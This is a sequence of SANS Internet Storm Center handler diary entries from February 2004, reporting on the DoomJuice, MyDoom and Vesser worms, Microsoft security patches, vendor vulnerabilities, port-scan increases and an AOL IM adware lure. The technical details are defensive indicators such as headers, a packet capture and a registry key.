For additional information, see these summaries:

http://securityresponse.symantec.com/avcenter/venc/data/w32.welchia.b.worm.html

http://www.sophos.com/virusinfo/analyses/w32nachib.html

http://www.f-secure.com/v-descs/welchi_b.shtml
Microsoft XML Patch

Microsoft patch MS04-004 ("Cumulative Security Update for Internet Explorer"), which was released earlier in February, removed the ability to add credentials to http and https URLs. However, this patch removed the ability to add a username
and password to XMLHTTP.open calls.

The exact behavior is explained here: http://support.microsoft.com/default.aspx?scid=kb;en-us;832414
A fix was released to solve the problem with XMLHTTP.open calls.

-------------------------

Johannes Ullrich, SANS Institute, jullrich_AT_sans.org

Feedback: http://isc.sans.org/contact.html

0 Comments

Published: 2004-02-11

DommJuice variant / AOL IM issue / ISC webcast / Microsoft Patches

DoomJuice New Variant



A new variant of DoomJuice was discovered today. According the F-secure analysis, this new variant also targets Microsoft website. "This new variant tries to improve the Distributed Denial-of-Service attack on www.microsoft.com".
This time it will sets random HTTP headers:

User-Agent: Mozilla/4.0

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)

Accept-Encoding: gzip, deflate

Accept-Language: en

Accept-Language: en-us




A packet capture sample, by the ISC Handler Lenny Zeltser:

02/10-23:17:22.587900 192.168.232.136:2875 -> 192.168.232.135:80

TCP TTL:128 TOS:0x0 ID:9216 IpLen:20 DgmLen:243 DF

***AP*** Seq: 0x7DC55 Ack: 0x7CA887AD Win: 0x2238 TcpLen: 20

47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..

41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 Accept: */*..Acc

65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 6E ept-Language: en

2D 75 73 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F -us..Accept-Enco

64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66 6C ding: gzip, defl

61 74 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A ate..User-Agent:

20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F Mozilla/4.0 (co

6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 mpatible; MSIE 6

2E 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 .0; Windows NT 5

2E 31 29 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 6D .1)..Host: www.m

69 63 72 6F 73 6F 66 74 2E 63 6F 6D 3A 38 30 0D icrosoft.com:80.

0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 .Connection: Kee

70 2D 41 6C 69 76 65 0D 0A 0D 0A p-Alive....




According Lenny, the new DoomJuice uses a different file name when copying itself locally,and a different registry key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\NeroCheck
C:\WINDOWS\SYSTEM\regedit.exe

Note that the real Windows-supplied regedit.exe is in C:\WINDOWS, and is not
overwritten by the new DoomJuice.


The attack against Microsoft website is set to start after 12th of February.


Reference: http://www.f-secure.com/v-descs/doomjuiceb.shtml




ISC Webcast



Today´s ISC Webcast, the Monthly Threat Update, which covered some this month´s issues like MyDoom, Microsoft Patches and the Monthly relevant numbers, will be soon available at http://www.sans.org/webcasts/



Mailbag


Some users are asking us about a possible DDoS at Microsoft Windows Update website due to the slow access to it.
There is no indication of such activity, but this symptom could be a direct result of the Microsoft Security Bulletins released yesterday with three new updates.


Reference: http://isc.sans.org/diary.html?date=2004-02-10



AOL IM pseudo-virus-adware



We are receiving some reports about the called "IM virus". As included in yesterdays diary (http://isc.sans.org/diary.html?date=2004-02-10).


In short, a link is received by the user (www.wgutv.com/osama_capture.php?XxCC), and when he/she clicks in the URL, it will be directed to the website, and be prompted to install a "News Player" which will also install some tools in the computer and also send the same alerts to your buddy list.



From this software Terms and Privacy Policy, you can find the following disclaimer:


/*

Services; Modifications to Your Instant Messaging Client.
The Software provides you the opportunity to access Content for no charge. In return for the right to access this Content, you acknowledge and agree that the Software contains additional software products provided to PSD Tools by its suppliers which will periodically deliver additional Content such as, but not limited to, advertisements and promotional messages to your Computer and programs that may alter your home page to offer you Content. In addition, the Software will interoperate with your current instant messaging client so as to permit the automatic sending of advertising messages originating from your Computer to your contact or “buddy” list regarding Content offered by PSD Tools or its suppliers. If you desire to stop this activity, you may elect to stop the messages by navigating to the “buddylinks.net” entry in your “Start Menu”, selecting the “buddylinks.net Configuration” item, and unchecking the appropriate option. You may also refer to PSD Tools’ website at http://www.psdtools.com for an uninstaller.

*/



The installer can not be found at http://www.psdtools.com , but in http://www.buddylinks.net/support.php page.


So, as best practices, be careful when allowing anything to be installed in your computer.
Microsoft Patches


Just a note to remember about the just released Microsoft Patches and posted in yesterday's diary.

Reference: http://isc.sans.org/diary.html?date=2004-02-10

---------------------------------------------------

Handler on duty: Pedro Bueno

0 Comments

Published: 2004-02-10

Microsoft Releases Updates (1 - Critical, 2 - Important)

Microsoft has just released information on three updates:



The most critical of the three is entitled "ASN.1 Vulnerability Could Allow Code Execution (828028)" and affects all Windows operating systems based on the NT core (NT, 2000, XP, and Server 2003):



http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS04-007.asp


Essentially, there are multiple possible overflow conditions that exist within the ASN.1 implementation inside Microsoft's MSASN1.DLL.



Affected software that uses this library includes:

   - Microsoft Internet Explorer

   - Outlook express

   - Outlook

   - IIS (using SSL as in https)

   - Microsoft's Kerberos implementation

   - NTLMv2 authentication

   - Third party software using encryption certificates



This is a critical issue and should be addressed immediately, exploits are expected soon.



Additional Information on the ASN.1 issues can be found at eEye Digital Security's site:


http://www.eeye.com/html/Research/Advisories/AD20040210.html


and


http://www.eeye.com/html/Research/Advisories/AD20040210-2.html


--------------------------------------------------------------------



Listed as "Important" are two additional updates, "Vulnerability in the Windows Internet Naming Service (WINS) Could Allow Code Execution (830352)":



http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS04-006.asp


(This is a vulnerability in the WINS Service on Windows NT Server, NT Terminal Server, Windows 2000 Server and Windows Server 2003. This vulnerability is listed as "important" by Microsoft.)



and "Vulnerability in Virtual PC for Mac could lead to privilege elevation (835150)":


http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS04-005.asp


(The target of this vulnerability is not in widespread use and could not be effectively targeted, hence Microsoft's listing it as "important." If you know someone using this software on the Mac, please notify them, because they may not be aware of Microsoft's information distibution channels.)



--------------------------------------------------------------------



Other Stuff


We have received reports of a "download this cool game" link circulating on AOL Instant Messenger. The game, when downloaded and executed, sends IMs to your contacts, telling them to "download this cool game". And so on, and so on, and so on...


We're not entirely sure if this is to be considered a "virus" or simply "annoying IM spam."



--------------------------------------------------------------------


Handler on duty: Tom Liston - http://www.labreatechnologies.com

0 Comments

Published: 2004-02-09

Doomjuice/MyDoom.C, Sharp Increase in port 445 and 139 scans

Doomjuice/MyDoom.C

A new worm, named Doomjuice and MyDoom.C by various AV vendors, was identified. It spreads by exploiting the backdoor left by MyDoom.A and MyDoom.B. After infecting a system, it leaves a copy of the Mydoom.A source in a file named 'sync-src-1.00.tbz'. Doomjuice is also set to perform a DDOS against www.microsoft.com.

More information and removal instructions are available at:

http://www.lurhq.com/mydoom-c.html
http://www.f-secure.com/v-descs/doomjuice.shtml
http://www.sarc.com/avcenter/venc/data/w32.hllw.doomjuice.html

Port 445 and 139

A sharp increase in the number of connections to ports 445 and 139 has been reported. The source of these has yet to be determined.


MyDoom Hype Fueled By Antivirus Software Vendors

Computerworld has a good article regarding the media hype that has been generated around the MyDoom worms. MyDoom is credited as the fastest spreading worms in history, but has not caused nearly the disruptions of Slammer and Blaster. Article is here:

http://www.computerworld.com/securitytopics/security/story/0,10801,89649,00.html

Handler on Duty: Dave Brookshire

0 Comments

Published: 2004-02-08

Port 39999; Possible Vesser/W32.HLLW.Deadhat activity

For the most part, it was a pretty quiet day, with just the normal noise on the Internet. Here are some things:

Port 39999

Activity to port 39999 was reported today. It appears that may be attempts to connect to a Trojan called Trojan.mitglieder.b.html that sets up a proxy on this port and is used to send spam. Once a system is infected, the Trojan will notify certain sites of the compromise. For more information see

http://www.symantec.com/avcenter/venc/data/trojan.mitglieder.b.html



**As a side note, don't forget that many folks connecting to the Internet use DHCP and as a result, they often inheirit the IP of someone offering services or infected by malicious code that listens on a certain port. As a result, you may see unusual and maybe persistant connection attempts to the port on your box as a result.**

Possible Vesser/W32.HLLW.Deadhat activity

More reports of activity on ports 3127, 3128 and 1080 are coming in. This seems to be consistant with the worm Vesser/W32.HLLW.Deadhat activity. For more information on this see the diary entry from 7 February 04.

http://isc.sans.org/diary.html?date=2004-02-07


Lorna Hutcheson

0 Comments

Published: 2004-02-07

Port 1080, 3127 and 3128; Apache-SSL Optional Client Certificate Vulnerability

Port 1080, 3127 and 3128

There has been an increase of attempts directed at port 1080, 3127 and 3128 for the past few days. At this point of time, no firm conclusion can be made on these activities.


F-Secure reported a new worm (Vesser) that might be responsible for these activities. This worm spreads through the backdoor of Mydoom and SoulSeek P2P program. As reported, it will remove Mydoom backdoor on infected machines. It contains an IRC-based backdoor and HTTP proxy:

http://www.f-secure.com/v-descs/vesser.shtml


Symantec's W32.HLLW.Deadhat writeup:

http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.deadhat.html
NAI also calls it Deadhat:

http://vil.nai.com/vil/content/v_101000.htm

Let us know if you have further details on this worm.


Apache-SSL optional client certificate vulnerability

A vulnerability is reported in Apache-SSL optional client certificate configuration. If configured with SSLVerifyClient set to 1 or 3 (client certificates optional) and SSLFakeBasicAuth, Apache-SSL 1.3.28+1.52 and all earlier versions would permit a client to use real basic authentication to forge a client certificate.

The vendor has issued a fixed version of Apache-SSL (1.3.29+1.53):

http://www.apache-ssl.org/advisory-20040206.txt

0 Comments

Published: 2004-02-05

Flaws in Checkpoint and RealOne; MyDoom Update; AntiVirus Software; Data Call

Checkpoint Product Flaws. According to Internet Security Systems (ISS), there are two new vulnerabilities in Checkpoint products: a buffer overflow in the ISAKMP processing component for both the Checkpoint VPN-1 server and Checkpoint VPN clients, and several remotely exploitable format string vulnerabilities in the HTTP Application Intelligence component of Firewall-1. Details about both are on ISS' web site at http://xforce.iss.net/xforce/alerts/id/162 and http://xforce.iss.net/xforce/alerts/id/163 .


(An interesting point for graduates of the SANS Hacker Techniques, Exploits and Incident Handling track - remember the class on format string attacks? Now you really DO have something you can talk about this weekend at a cocktail party!)


As far as we know there are no exploits for either of these vulnerabilities in the wild. Unfortunately we have found that many of the Internet search engines will locate installations of Firewall-1 if the HTTP proxy is active. This puts those sites at extreme risk for attack if they are not quickly updated.


RealOne Vulnerable to Remote Exploits. Real Networks released a bulletin on Wednesday detailing vulnerabilities in their RealOne player. Details and instructions for upgrading are on the web at http://www.service.real.com/help/faq/security/040123_player/EN/


MyDoom Virus Source Tracing. As we all know, the MyDoom virus uses forged source addresses, making traceback a bit harder than just looking at the FROM address. If you examine the SMTP header of one of these emails, you might find that the original IP address of the sender is present, plus the message ID if the sender uses a typical email client. Both of these items of information can be used to track down computers that remain infected.


ISP Port Blocking. Because of the MyDoom virus, some ISPs are blocking ports 3127-3198. This affects Windows users since Windows often uses this port range as the source port for outgoing connections. If you are using Windows, and ping, traceroute, and other utilities "see" the Internet but your browser and other applications cannot, this might be the cause.


AntiVirus Client Software. One more plea to the antivirus software vendors: PLEASE turn off the auto-response feature! We have found that in addition to the corporate email systems sending autoresponses to the FROM addressee of infected emails, some popular antivirus clients also do this. The result is an increase in the amount of pointless error messages, and an increase in confused consumers who do not understand why they are getting the warnings from other computers.


Request for Data. A reader has asked if others are seeing an increase in activity directed toward tcp/1080 and 3128. Our data shows an increase in targets over the past few days. Please check your logs and if you see the same increase and have any ideas about the source please drop us a note. Likewise, tcp/1024 is showing an interesting increase.



Marcus H. Sachs

The SANS Institute

Handler on Duty

0 Comments

Published: 2004-02-04

Port 12345 / NAT fingerprint

Port 12345


We noticed an increase in the targets and records of port 12345. While the source number is still stable, this traffic is considered suspicious.
The graph of this activity can be found here: http://www.dshield.org/port_report.php?port=12345

We are requesting some packet dumps of this activity. Tcpdump/Windump format is preferable.





NAT devices fingerprint


A request for data was posted today at the Intrusions List.
Johannes Ullrich, ISC's CTO is requesting help to
fingerprinting various NAT devices based on source ports.


If you have a NAT device, please hit this page:
http://isc.sans.org/nattest.html

It will tell you the source port, and allow you to fill in
the NAT device you use to have it emailed to ISC database.

-------------------------------------------------------------------------------

Handler on duty: Pedro Bueno

0 Comments

Published: 2004-02-03

MyDoom.A Timeline, MyDoom.B DDoS a Non-Event

Not a whole lot of stuff going on today... MyDoom.A is still filling in-boxes, while MyDoom.B, which was initially greeted with dire predictions, seems to have been a dud.



If you're involved in the cleanup of an infected system, it is important to remember that beyond simply spamming the world, MyDoom.A opens a backdoor starting at port 3127 TCP. Any infected system directly connected to the Internet could have been further compromised and should seriously be considered as a candidate for a complete reinstall.



MyDoom.A Timeline



Panda Software has published a MyDoom.A timeline which can be found at:



http://www.net-security.org/virus_news.php?id=359



While we have heard many theories about possible mechanisms behind the rapid spread of MyDoom, examination of compromised machines and the code itself does not indicate a cause beyond the simple fact that even in today's Internet aware world, people still execute attachments. User education needs to become a priority.





MyDoom.B DDoS a Non-Event



The February 3rd deadline for the MyDoom.B virus DDoS against www.microsoft.com passed without having any effect on the availability of of Microsoft's website. The website of The SCO Group (www.sco.com), apparently the target of a DDoS by MyDoom.A, is still unavailable. The "A" record for the "www" server was removed from the "sco.com" DNS entry on February 1 in an attempt to mitigate the expected attack.



----------------------------------------------------------------

Handler on Duty: Tom Liston - http://www.labreatechnologies.com

0 Comments

Published: 2004-02-02

Microsoft Releases IE Cumulative Patch (MS04-004)


Microsoft Releases Internet Explorer Cumulative Patch (MS04-004)

Earlier today Microsoft released patches for Internet Explorer versions 5.01, 5.5, and 6.0. This cumulative patch replaces the one that is provided by Microsoft Security Bulletin MS03-048.
The Bulletin is located at:

http://www.microsoft.com/technet/security/Bulletin/MS04-004.asp
It is reported that this update eliminates a vulnerability in the cross-domain security model, a vulnerability involving drag-and-drop operations during dynamic HTML (DHTML) events, and the vulnerability involving URL parsing which contains special characters. Each of these vulnerabilities is rated at either Critical or Important for any version of Windows previous Windows Server 2003. They are listed as Moderate or Important for Windows Server 2003.
In addition, the basic authentication features of Internet Explorer have been modified to remove handling user names and passwords in HTTP, HTTPS, and XMLHTTP URLs. This change may have a dramatic effect on end-users that may be bookmarking or otherwise storing their passwords as part of the URL. Though this change does improve security, end users may complain about the loss of this ability.
For more information on the URL Parsing vulnerability please see:

http://isc.sans.org/diary.html?date=2003-12-23
Internet Storm Center

Scott Fendley - Handler on duty

0 Comments